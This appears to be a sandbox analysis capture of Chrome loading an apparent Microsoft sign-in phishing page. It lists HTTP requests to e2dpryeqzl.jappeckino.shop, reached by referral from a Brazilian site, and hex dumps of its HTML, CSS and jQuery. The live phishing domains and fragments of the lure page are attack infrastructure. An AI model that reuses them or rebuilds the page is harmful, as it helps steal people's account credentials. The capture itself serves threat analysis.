                                2025-01-14 03:33:00 UTC7933INData Raw: 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 63 6c 61 73 73 3d 22 55 4c 31 4f 38 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 65 32 64 70 72 79 65 71 7a 6c 2e 6a 61 70 70 65 63 6b 69 6e 6f 2e 73 68 6f 70 2f 6d 2f 22 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 61 20 7b 70 6f 69 6e 74 65 72 2d 65 76 65 6e 74 73 3a 20 6e 6f 6e 65 3b 63 75 72 73 6f 72 3a 20 64 65 66 61 75 6c 74 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 74 69 74 6c 65 3e 48 32 52 4d 36 37 32 37 46 42 51 43 38 32 59 59 4d 4f 30 46 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c
                                Data Ascii: <html dir="ltr" class="UL1O8" lang="en"><head><base href="https://e2dpryeqzl.jappeckino.shop/m/"><style type="text/css"> a {pointer-events: none;cursor: default;}</style><title>H2RM6727FBQC82YYMO0F</title><meta http-equiv="Content-Type" content="text/html
                                2025-01-14 03:33:00 UTC1871INData Raw: 3c 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 61 20 69 64 3d 22 61 61 64 52 65 64 69 72 65 63 74 43 61 6e 63 65 6c 22 20 68 72 65 66 3d 22 23 22 20 61 72 69 61 2d 64 65 73 63 72 69 62 65 64 62 79 3d 22 6c 6f 67 69 6e 48 65 61 64 65 72 22 3e 43 61 6e 63 65 6c 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 64 3d 22 69 64 42 6f 69 6c 65 72 50 6c 61 74 65 54 65 78 74 22 20 63 6c 61 73 73 3d 22 77 72 61 70 2d 63 6f 6e 74 65 6e 74 20 62 6f 69 6c 65 72 70 6c 61 74 65 2d 74 65 78 74 20 65 78 74 2d 62 6f 69 6c 65 72 70 6c 61 74 65 2d 74
                                Data Ascii: <div></div><div></div><div></div><div></div><div></div></div></div><a id="aadRedirectCancel" href="#" aria-describedby="loginHeader">Cancel</a></div></div></div></div></div><div id="idBoilerPlateText" class="wrap-content boilerplate-text ext-boilerplate-t


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.449747203.161.57.1394434176C:\Program Files\Google\Chrome\Application\chrome.exe
                                TimestampBytes transferredDirectionData
                                2025-01-14 03:33:01 UTC582OUTGET /m/cxx/88VT2QMJSV8PY8WZL0KO3AQLQ HTTP/1.1
                                Host: e2dpryeqzl.jappeckino.shop
                                Connection: keep-alive
                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                sec-ch-ua-mobile: ?0
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                sec-ch-ua-platform: "Windows"
                                Accept: text/css,*/*;q=0.1
                                Sec-Fetch-Site: cross-site
                                Sec-Fetch-Mode: no-cors
                                Sec-Fetch-Dest: style
                                Referer: https://mudedevidaparasempre.com.br/
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-US,en;q=0.9
                                2025-01-14 03:33:01 UTC261INHTTP/1.1 200 OK
                                Date: Tue, 14 Jan 2025 03:33:01 GMT
                                Server: Apache/2.4.62 (Unix) OpenSSL/3.2.2
                                X-Powered-By: PHP/7.4.33
                                Vary: Accept-Encoding,User-Agent
                                Connection: close
                                Transfer-Encoding: chunked
                                Content-Type: text/css; charset: UTF-8;charset=UTF-8
                                2025-01-14 03:33:01 UTC6349INData Raw: 31 38 63 35 0d 0a 2a 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 7d 0d 0a 2a 3a 62 65 66 6f 72 65 2c 2a 3a 61 66 74 65 72 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 7d 0d 0a 2e 66 6f 72 6d 2d 67 72 6f 75 70 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 32 70 78 3b 7d 0d 0a 2e 63 5f 6c 6f 61 64 69 6e 67 44 6f 74 73 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 3b 77 68 69
                                Data Ascii: 18c5*{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;}*:before,*:after{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box;}.form-group{margin-bottom:12px;}.c_loadingDots{line-height:0;whi
                                2025-01-14 03:33:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.2.449746203.161.57.1394434176C:\Program Files\Google\Chrome\Application\chrome.exe
                                TimestampBytes transferredDirectionData
                                2025-01-14 03:33:01 UTC581OUTGET /m/sm/75R38C5T8QZBJLSXTQJJ3E2CI HTTP/1.1
                                Host: e2dpryeqzl.jappeckino.shop
                                Connection: keep-alive
                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                sec-ch-ua-mobile: ?0
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                sec-ch-ua-platform: "Windows"
                                Accept: text/css,*/*;q=0.1
                                Sec-Fetch-Site: cross-site
                                Sec-Fetch-Mode: no-cors
                                Sec-Fetch-Dest: style
                                Referer: https://mudedevidaparasempre.com.br/
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-US,en;q=0.9
                                2025-01-14 03:33:01 UTC261INHTTP/1.1 200 OK
                                Date: Tue, 14 Jan 2025 03:33:01 GMT
                                Server: Apache/2.4.62 (Unix) OpenSSL/3.2.2
                                X-Powered-By: PHP/7.4.33
                                Vary: Accept-Encoding,User-Agent
                                Connection: close
                                Transfer-Encoding: chunked
                                Content-Type: text/css; charset: UTF-8;charset=UTF-8
                                2025-01-14 03:33:01 UTC7931INData Raw: 33 65 32 65 0d 0a 68 74 6d 6c 20 7b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 20 31 30 30 25 3b 20 7d 0d 0a 62 6f 64 79 20 7b 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 20 7d 0d 0a 61 72 74 69 63 6c 65 2c 20 61 73 69 64 65 2c 20 64 65 74 61 69 6c 73 2c 20 66 69 67 63 61 70 74 69 6f 6e 2c 20 66 69 67 75 72 65 2c 20 66 6f 6f 74 65 72 2c 20 68 65 61 64 65 72 2c 20 68 67 72 6f 75 70 2c 20 6d 61 69 6e 2c 20 6d 65 6e 75 2c 20 6e 61 76 2c 20 73 65 63 74 69 6f 6e 2c 20 73 75 6d 6d 61 72 79 20 7b 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 20 7d 0d 0a 61 75 64 69 6f 2c 20 63 61 6e 76 61 73 2c 20 70 72 6f 67 72 65 73 73 2c 20 76 69 64 65 6f 20 7b 20 64 69 73 70 6c 61 79 3a 20 69
                                Data Ascii: 3e2ehtml { font-family: sans-serif; text-size-adjust: 100%; }body { margin: 0px; }article, aside, details, figcaption, figure, footer, header, hgroup, main, menu, nav, section, summary { display: block; }audio, canvas, progress, video { display: i
                                2025-01-14 03:33:01 UTC7993INData Raw: 68 74 3a 20 34 30 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 36 32 35 72 65 6d 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 30 2e 37 35 72 65 6d 3b 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 30 2e 38 31 38 70 78 3b 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 30 2e 38 31 38 70 78 3b 20 7d 0d 0a 2e 74 65 78 74 2d 63 61 70 74 69 6f 6e 2d 61 6c 74 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 31 2c 20 68 36 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 31 20 7b 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 20 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 20 65 6c 6c 69 70 73 69 73 3b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 30 2e 38 35 32 32 35 72 65 6d 3b 20 7d 0d 0a 2e 74 65 78 74 2d 63 61 70 74 69 6f 6e 2d 61 6c 74 2e 74 65 78 74 2d 6d
                                Data Ascii: ht: 400; font-size: 0.625rem; line-height: 0.75rem; padding-bottom: 0.818px; padding-top: 0.818px; }.text-caption-alt.text-maxlines-1, h6.text-maxlines-1 { white-space: nowrap; text-overflow: ellipsis; max-height: 0.85225rem; }.text-caption-alt.text-m
                                2025-01-14 03:33:01 UTC2INData Raw: 0d 0a
                                Data Ascii:
                                2025-01-14 03:33:01 UTC8192INData Raw: 31 66 34 30 0d 0a 61 72 67 69 6e 2d 6c 65 66 74 3a 20 39 31 2e 36 36 36 37 25 3b 20 7d 0d 0a 2e 63 6f 6c 2d 78 73 2d 6f 66 66 73 65 74 2d 32 33 20 7b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 39 35 2e 38 33 33 33 25 3b 20 7d 0d 0a 2e 63 6f 6c 2d 78 73 2d 6f 66 66 73 65 74 2d 32 34 20 7b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 30 30 25 3b 20 7d 0d 0a 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 35 34 30 70 78 29 20 7b 0d 0a 20 20 2e 63 6f 6c 2d 73 6d 2d 31 2c 20 2e 63 6f 6c 2d 73 6d 2d 32 2c 20 2e 63 6f 6c 2d 73 6d 2d 33 2c 20 2e 63 6f 6c 2d 73 6d 2d 34 2c 20 2e 63 6f 6c 2d 73 6d 2d 35 2c 20 2e 63 6f 6c 2d 73 6d 2d 36 2c 20 2e 63 6f 6c 2d 73 6d 2d 37 2c 20 2e 63 6f 6c 2d 73 6d 2d 38 2c 20 2e 63 6f 6c 2d 73 6d 2d 39 2c 20 2e 63 6f 6c 2d 73
                                Data Ascii: 1f40argin-left: 91.6667%; }.col-xs-offset-23 { margin-left: 95.8333%; }.col-xs-offset-24 { margin-left: 100%; }@media (min-width: 540px) { .col-sm-1, .col-sm-2, .col-sm-3, .col-sm-4, .col-sm-5, .col-sm-6, .col-sm-7, .col-sm-8, .col-sm-9, .col-s
                                2025-01-14 03:33:01 UTC7822INData Raw: 66 66 73 65 74 2d 31 39 20 7b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 37 39 2e 31 36 36 37 25 3b 20 7d 0d 0a 20 20 2e 63 6f 6c 2d 6d 64 2d 6f 66 66 73 65 74 2d 32 30 20 7b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 38 33 2e 33 33 33 33 25 3b 20 7d 0d 0a 20 20 2e 63 6f 6c 2d 6d 64 2d 6f 66 66 73 65 74 2d 32 31 20 7b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 38 37 2e 35 25 3b 20 7d 0d 0a 20 20 2e 63 6f 6c 2d 6d 64 2d 6f 66 66 73 65 74 2d 32 32 20 7b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 39 31 2e 36 36 36 37 25 3b 20 7d 0d 0a 20 20 2e 63 6f 6c 2d 6d 64 2d 6f 66 66 73 65 74 2d 32 33 20 7b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 39 35 2e 38 33 33 33 25 3b 20 7d 0d 0a 20 20 2e 63 6f 6c 2d 6d 64 2d 6f 66 66 73 65 74 2d 32 34 20 7b 20 6d 61 72 67 69 6e 2d
                                Data Ascii: ffset-19 { margin-left: 79.1667%; } .col-md-offset-20 { margin-left: 83.3333%; } .col-md-offset-21 { margin-left: 87.5%; } .col-md-offset-22 { margin-left: 91.6667%; } .col-md-offset-23 { margin-left: 95.8333%; } .col-md-offset-24 { margin-
                                2025-01-14 03:33:01 UTC2INData Raw: 0d 0a
                                Data Ascii:
                                2025-01-14 03:33:01 UTC8192INData Raw: 31 66 34 30 0d 0a 6f 6c 2d 78 6c 2d 6f 66 66 73 65 74 2d 38 20 7b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 33 2e 33 33 33 33 25 3b 20 7d 0d 0a 20 20 2e 63 6f 6c 2d 78 6c 2d 6f 66 66 73 65 74 2d 39 20 7b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 37 2e 35 25 3b 20 7d 0d 0a 20 20 2e 63 6f 6c 2d 78 6c 2d 6f 66 66 73 65 74 2d 31 30 20 7b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 34 31 2e 36 36 36 37 25 3b 20 7d 0d 0a 20 20 2e 63 6f 6c 2d 78 6c 2d 6f 66 66 73 65 74 2d 31 31 20 7b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 34 35 2e 38 33 33 33 25 3b 20 7d 0d 0a 20 20 2e 63 6f 6c 2d 78 6c 2d 6f 66 66 73 65 74 2d 31 32 20 7b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 35 30 25 3b 20 7d 0d 0a 20 20 2e 63 6f 6c 2d 78 6c 2d 6f 66 66 73 65 74 2d 31 33 20 7b 20 6d
                                Data Ascii: 1f40ol-xl-offset-8 { margin-left: 33.3333%; } .col-xl-offset-9 { margin-left: 37.5%; } .col-xl-offset-10 { margin-left: 41.6667%; } .col-xl-offset-11 { margin-left: 45.8333%; } .col-xl-offset-12 { margin-left: 50%; } .col-xl-offset-13 { m
                                2025-01-14 03:33:01 UTC7822INData Raw: 20 6c 61 62 65 6c 20 7b 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 38 70 78 3b 20 7d 0d 0a 2e 72 61 64 69 6f 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2c 20 2e 72 61 64 69 6f 2d 69 6e 6c 69 6e 65 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2c 20 2e 63 68 65 63 6b 62 6f 78 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 63 68 65 63 6b 62 6f 78 22 5d 2c 20 2e 63 68 65 63 6b 62 6f 78 2d 69 6e 6c 69 6e 65 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 63 68 65 63 6b 62 6f 78 22 5d 20 7b 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 32 38 70 78 3b 20 7d 0d 0a 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 5b 64 69 73 61 62 6c 65 64 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65
                                Data Ascii: label { padding-left: 28px; }.radio input[type="radio"], .radio-inline input[type="radio"], .checkbox input[type="checkbox"], .checkbox-inline input[type="checkbox"] { position: absolute; margin-left: -28px; }input[type="radio"][disabled], input[type
                                2025-01-14 03:33:01 UTC2INData Raw: 0d 0a
                                Data Ascii:
                                2025-01-14 03:33:01 UTC8192INData Raw: 31 66 34 30 0d 0a 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 32 2e 35 32 38 33 38 72 65 6d 3b 20 7d 0d 0a 2e 73 65 63 74 69 6f 6e 20 2e 73 65 63 74 69 6f 6e 2d 74 69 74 6c 65 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 33 20 7b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 33 2e 37 37 38 33 38 72 65 6d 3b 20 7d 0d 0a 2e 73 65 63 74 69 6f 6e 20 2e 73 65 63 74 69 6f 6e 2d 74 69 74 6c 65 2e 74 65 78 74 2d 6d 61 78 6c 69 6e 65 73 2d 34 20 7b 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 35 2e 30 32 38 33 38 72 65 6d 3b 20 7d 0d 0a 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 33 32 30 70 78 29 20 7b 0d 0a 20 20 2e 73 65 63 74 69 6f 6e 20 2e 73 65 63 74 69 6f 6e 2d 74 69 74 6c 65 20 7b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 20 66 6f 6e 74 2d 73 69 7a
                                Data Ascii: 1f40 max-height: 2.52838rem; }.section .section-title.text-maxlines-3 { max-height: 3.77838rem; }.section .section-title.text-maxlines-4 { max-height: 5.02838rem; }@media (min-width: 320px) { .section .section-title { font-weight: 300; font-siz


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                3192.168.2.449748203.161.57.1394434176C:\Program Files\Google\Chrome\Application\chrome.exe
                                TimestampBytes transferredDirectionData
                                2025-01-14 03:33:01 UTC567OUTGET /m/jx/BY9284WK32TP02VZXSQRC7V0Q HTTP/1.1
                                Host: e2dpryeqzl.jappeckino.shop
                                Connection: keep-alive
                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                sec-ch-ua-mobile: ?0
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                sec-ch-ua-platform: "Windows"
                                Accept: */*
                                Sec-Fetch-Site: cross-site
                                Sec-Fetch-Mode: no-cors
                                Sec-Fetch-Dest: script
                                Referer: https://mudedevidaparasempre.com.br/
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-US,en;q=0.9
                                2025-01-14 03:33:01 UTC268INHTTP/1.1 200 OK
                                Date: Tue, 14 Jan 2025 03:33:01 GMT
                                Server: Apache/2.4.62 (Unix) OpenSSL/3.2.2
                                X-Powered-By: PHP/7.4.33
                                Vary: Accept-Encoding,User-Agent
                                Connection: close
                                Transfer-Encoding: chunked
                                Content-Type: text/javascript; charset: UTF-8;charset=UTF-8
                                2025-01-14 03:33:01 UTC7924INData Raw: 33 65 32 37 0d 0a 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 37 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f
                                Data Ascii: 3e27/*! jQuery v3.7.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Erro
                                2025-01-14 03:33:01 UTC7993INData Raw: 66 75 6e 63 74 69 6f 6e 20 42 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 65 28 65 2c 22 69 6e 70 75 74 22 29 26 26 65 2e 74 79 70 65 3d 3d 3d 74 7d 7d 66 75 6e 63 74 69 6f 6e 20 5f 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 28 66 65 28 65 2c 22 69 6e 70 75 74 22 29 7c 7c 66 65 28 65 2c 22 62 75 74 74 6f 6e 22 29 29 26 26 65 2e 74 79 70 65 3d 3d 3d 74 7d 7d 66 75 6e 63 74 69 6f 6e 20 58 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 66 6f 72 6d 22 69 6e 20 65 3f 65 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 21 31 3d 3d 3d 65 2e 64 69 73 61 62 6c 65 64 3f 22 6c 61 62 65 6c 22 69 6e 20 65 3f 22 6c 61 62 65 6c 22 69 6e 20 65 2e
                                Data Ascii: function B(t){return function(e){return fe(e,"input")&&e.type===t}}function _(t){return function(e){return(fe(e,"input")||fe(e,"button"))&&e.type===t}}function X(t){return function(e){return"form"in e?e.parentNode&&!1===e.disabled?"label"in e?"label"in e.
                                2025-01-14 03:33:01 UTC2INData Raw: 0d 0a
                                Data Ascii:
                                2025-01-14 03:33:01 UTC8192INData Raw: 31 66 34 30 0d 0a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 65 3d 65 2e 66 69 72 73 74 43 68 69 6c 64 3b 65 3b 65 3d 65 2e 6e 65 78 74 53 69 62 6c 69 6e 67 29 69 66 28 65 2e 6e 6f 64 65 54 79 70 65 3c 36 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 70 61 72 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 62 2e 70 73 65 75 64 6f 73 2e 65 6d 70 74 79 28 65 29 7d 2c 68 65 61 64 65 72 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 71 2e 74 65 73 74 28 65 2e 6e 6f 64 65 4e 61 6d 65 29 7d 2c 69 6e 70 75 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 4e 2e 74 65 73 74 28 65 2e 6e 6f 64 65 4e 61 6d 65 29 7d 2c 62 75 74 74 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 65
                                Data Ascii: 1f40function(e){for(e=e.firstChild;e;e=e.nextSibling)if(e.nodeType<6)return!1;return!0},parent:function(e){return!b.pseudos.empty(e)},header:function(e){return q.test(e.nodeName)},input:function(e){return N.test(e.nodeName)},button:function(e){return fe
                                2025-01-14 03:33:01 UTC7822INData Raw: 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 41 28 65 2c 22 6e 65 78 74 53 69 62 6c 69 6e 67 22 29 7d 2c 70 72 65 76 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 41 28 65 2c 22 70 72 65 76 69 6f 75 73 53 69 62 6c 69 6e 67 22 29 7d 2c 6e 65 78 74 41 6c 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 64 28 65 2c 22 6e 65 78 74 53 69 62 6c 69 6e 67 22 29 7d 2c 70 72 65 76 41 6c 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 64 28 65 2c 22 70 72 65 76 69 6f 75 73 53 69 62 6c 69 6e 67 22 29 7d 2c 6e 65 78 74 55 6e 74 69 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 64 28 65 2c 22 6e 65 78 74 53 69 62 6c 69 6e 67 22 2c 6e 29 7d 2c 70 72 65 76 55 6e 74 69 6c 3a 66 75 6e 63 74 69 6f 6e
                                Data Ascii: ction(e){return A(e,"nextSibling")},prev:function(e){return A(e,"previousSibling")},nextAll:function(e){return d(e,"nextSibling")},prevAll:function(e){return d(e,"previousSibling")},nextUntil:function(e,t,n){return d(e,"nextSibling",n)},prevUntil:function
                                2025-01-14 03:33:01 UTC2INData Raw: 0d 0a
                                Data Ascii:
                                2025-01-14 03:33:01 UTC8192INData Raw: 31 66 34 30 0d 0a 72 65 6d 6f 76 65 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 58 2e 72 65 6d 6f 76 65 28 74 68 69 73 2c 65 29 7d 29 7d 7d 29 2c 63 65 2e 65 78 74 65 6e 64 28 7b 71 75 65 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3b 69 66 28 65 29 72 65 74 75 72 6e 20 74 3d 28 74 7c 7c 22 66 78 22 29 2b 22 71 75 65 75 65 22 2c 72 3d 5f 2e 67 65 74 28 65 2c 74 29 2c 6e 26 26 28 21 72 7c 7c 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 6e 29 3f 72 3d 5f 2e 61 63 63 65 73 73 28 65 2c 74 2c 63 65 2e 6d 61 6b 65 41 72 72 61 79 28 6e 29 29 3a 72 2e 70 75 73 68 28 6e 29 29 2c 72 7c 7c 5b 5d 7d 2c 64 65 71 75 65 75 65 3a 66 75 6e 63 74 69 6f 6e 28
                                Data Ascii: 1f40removeData:function(e){return this.each(function(){X.remove(this,e)})}}),ce.extend({queue:function(e,t,n){var r;if(e)return t=(t||"fx")+"queue",r=_.get(e,t),n&&(!r||Array.isArray(n)?r=_.access(e,t,ce.makeArray(n)):r.push(n)),r||[]},dequeue:function(
                                2025-01-14 03:33:01 UTC7822INData Raw: 79 28 69 2e 65 6c 65 6d 2c 73 29 29 26 26 21 31 3d 3d 3d 28 75 2e 72 65 73 75 6c 74 3d 72 29 26 26 28 75 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 75 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 29 29 7d 72 65 74 75 72 6e 20 63 2e 70 6f 73 74 44 69 73 70 61 74 63 68 26 26 63 2e 70 6f 73 74 44 69 73 70 61 74 63 68 2e 63 61 6c 6c 28 74 68 69 73 2c 75 29 2c 75 2e 72 65 73 75 6c 74 7d 7d 2c 68 61 6e 64 6c 65 72 73 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 2c 61 2c 73 3d 5b 5d 2c 75 3d 74 2e 64 65 6c 65 67 61 74 65 43 6f 75 6e 74 2c 6c 3d 65 2e 74 61 72 67 65 74 3b 69 66 28 75 26 26 6c 2e 6e 6f 64 65 54 79 70 65 26 26 21 28 22 63 6c 69 63 6b 22 3d 3d 3d 65 2e 74 79 70 65 26 26 31 3c 3d 65 2e 62 75 74 74
                                Data Ascii: y(i.elem,s))&&!1===(u.result=r)&&(u.preventDefault(),u.stopPropagation()))}return c.postDispatch&&c.postDispatch.call(this,u),u.result}},handlers:function(e,t){var n,r,i,o,a,s=[],u=t.delegateCount,l=e.target;if(u&&l.nodeType&&!("click"===e.type&&1<=e.butt
                                2025-01-14 03:33:01 UTC2INData Raw: 0d 0a
                                Data Ascii:
